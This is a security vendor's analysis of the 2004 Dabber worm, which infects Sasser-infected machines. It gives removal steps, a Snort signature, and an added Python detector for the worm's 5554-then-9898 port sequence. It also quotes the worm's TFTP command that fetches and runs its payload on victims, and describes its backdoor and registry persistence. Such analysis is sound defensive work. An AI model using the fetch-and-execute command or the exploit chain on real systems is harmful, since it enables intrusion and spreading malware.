Dabber Worm Analysis

SecureWorks' research team has discovered a new worm exploiting a vulnerability in the FTP server component of the Sasser worm. This worm will only infect users already infected by Sasser. Even though we have seen worms utilize backdoors left behind by other worms, this is the first time we have seen a worm using a vulnerability in another worm in order to propagate. We have named this worm "Dabber".

Update: May 14, 2004

Third-party analysis has indicated that Dabber is related to the Doomran worm discovered in March. Doomran had a similar method of operation, infecting hosts through the backdoor left by the Mydoom email virus; however, it merely used the Mydoom backdoor protocol rather than exploiting a vulnerability. It is likely that the author reused much of the worm code to create Dabber, substituting the Sasser FTP exploit for the Mydoom backdoor upload code and adding the ability to remove Sasser.

Correlations between scans on port 3127 (Mydoom backdoor) and port 9898 (Dabber/Doomran backdoor) were observed as early as February, but because no complete analysis of Doomran was available, the connection between the port 9898 activity and Doomran was not established until now.

File Details

Name: package.exe
Size: 29,696 bytes
MD5: 149dd119425ec801fbca6237413db631
PE compile time: Wed May 12 00:46:01 2004

The worm incorporates code from the Sasser-FTP exploit recently released by "mandragore" of the Romanian Security Research team. The worm scans for Sasser-infected hosts on port 5554. When it finds one, it uses the exploit to temporarily bind a Windows command shell to port 8967. The worm then connects to the victim host on that port and issues the following command:

tftp -i [infecting host ip] GET hello.all package.exe & package.exe & exit

The worm has a TFTP server built in to transfer its executable to the target system. When the command above runs, the file "package.exe" is copied to the victim system and executed.

When executed, the worm takes the following steps:

  • Copies itself to Startup folders and the Windows system directory.
  • Creates a mutex named "sas4dab" to ensure only one worm process runs in memory.
  • Installs a registry key to run at boot:

    In SOFTWARE\Microsoft\Windows\CurrentVersion\Run:

        sassfix -> %WINDIR%\package.exe
  • Deletes a list of registry keys of Sasser and other viruses:

    From SOFTWARE\Microsoft\Windows\CurrentVersion\Run:

    CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InProcServer32
    Gremlin
    Taskmon
    Video
    avserve
    avvserrve32
    avserve2.exe
    lsasss.exe
    lsasss
    ssgrate.exe
    ssgrate
    drvsys.exe
    drvsys
    drvsys
    Drvddll_exe
    Drvddll_exe
    Drvddll.exe
    Drvddll.exe
    Microsoft Update
    windows
    Windows Drive Compatibility
    Generic Host Service
    skynetave.exe
    navapsrc.exe
    lsasss.exe
    drvddll.exe
    ssgrate.exe
    WinMsrv32
    soundcontrl
    System Updater Service
    BagleAV
    MapiDrv
    SkynetRevenge
    TempCom
    Video Process
    Window
    
    From SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices:
    windows
    Windows Drive Compatibility
    Generic Host Service
    skynetave.exe
    navapsrc.exe
    lsasss.exe
    drvddll.exe
    ssgrate.exe
    WinMsrv32
    soundcontrl
    System Updater Service
    BagleAV
    MapiDrv
    SkynetRevenge
    TempCom
    Video Process
    Window
    
  • Sets up a TFTP server used to transfer the worm code to target systems.
  • Sets up a backdoor listener on TCP port 9898. An authenticated backdoor user can download additional code, execute processes on the infected system and get statistics about how many additional hosts have been infected by the local worm process.

From a network standpoint, the exploit process will look slightly different from interactive runs of the exploit code: the worm first connects to port 5554 and sends a single byte (an ASCII "C"). If that connection succeeds, it reconnects to port 5554 and sends the exploit. After the exploit has been sent, the worm attempts to connect to port 9898 on the target host to confirm that the infection was successful, again sending an ASCII "C". If the connection to port 9898 succeeds, an internal tally is incremented, presumably so that statistics can be retrieved from the backdoor later. Sequential scans on ports 5554 and 9898 are an indicator of an infection.
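The 5554-then-9898 sequence above can be picked out of ordinary flow or firewall logs. The following Python script is an added example, not part of the SecureWorks analysis; it runs over constructed sample flow records, and the 60-second pairing window is an assumed tuning value.

```python
# Added example, not from the SecureWorks analysis: flag source/target pairs
# whose connection sequence matches the Dabber propagation pattern above
# (contact on TCP/5554, then TCP/9898 on the same target shortly afterwards).
from datetime import datetime, timedelta

SASSER_FTP_PORT = 5554       # Sasser FTP server, where the exploit is sent
DABBER_BACKDOOR_PORT = 9898  # Dabber backdoor, probed to confirm infection

# Constructed sample flow records ("timestamp src dst dport"), not real traffic.
SAMPLE_FLOWS = """\
2004-05-12T10:00:01 10.0.0.5 10.0.0.20 5554
2004-05-12T10:00:02 10.0.0.5 10.0.0.20 5554
2004-05-12T10:00:04 10.0.0.5 10.0.0.20 9898
2004-05-12T10:00:07 10.0.0.5 10.0.0.21 5554
2004-05-12T10:03:00 10.0.0.9 10.0.0.30 9898
2004-05-12T10:05:00 10.0.0.7 10.0.0.40 5554
2004-05-12T10:45:00 10.0.0.7 10.0.0.40 9898
"""

def parse_flows(text):
    """Parse one flow record per line into (time, src, dst, dport) tuples."""
    flows = []
    for line in text.splitlines():
        if line.strip():
            ts, src, dst, dport = line.split()
            flows.append((datetime.fromisoformat(ts), src, dst, int(dport)))
    return sorted(flows)

def find_dabber_sequences(flows, window_seconds=60):
    """Return sorted (src, dst) pairs where a 5554 contact is followed within
    window_seconds by a 9898 contact to the same target from the same source.
    The 60-second default is an assumed tuning value, not from the analysis."""
    window = timedelta(seconds=window_seconds)
    last_probe = {}  # (src, dst) -> time of the most recent 5554 contact
    hits = set()
    for ts, src, dst, dport in flows:
        key = (src, dst)
        if dport == SASSER_FTP_PORT:
            last_probe[key] = ts
        elif dport == DABBER_BACKDOOR_PORT:
            probe = last_probe.get(key)
            if probe is not None and ts - probe <= window:
                hits.add(key)
    return sorted(hits)

if __name__ == "__main__":
    for src, dst in find_dabber_sequences(parse_flows(SAMPLE_FLOWS)):
        print(f"possible Dabber propagation: {src} -> {dst}")
```

A lone 9898 contact, or a 5554 contact with no follow-up within the window, is not reported, which keeps unrelated Sasser scanning out of the result.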

Removal

Kill the package.exe process using the Windows Task Manager. Remove the "sassfix" registry key. Delete package.exe from the Windows system directory and all startup folders.

Snort Signatures

The following Snort signature can detect the exploit used by the worm:

alert tcp any any -> any 5554 (msg:"Sasser FTP exploit attempt"; flow:to_server,established; content:"PORT "; depth:5; dsize:>150; classtype:attempted-admin; reference:url,www.secureworks.com/research/threats/dabber; sid:1000105; rev:1;)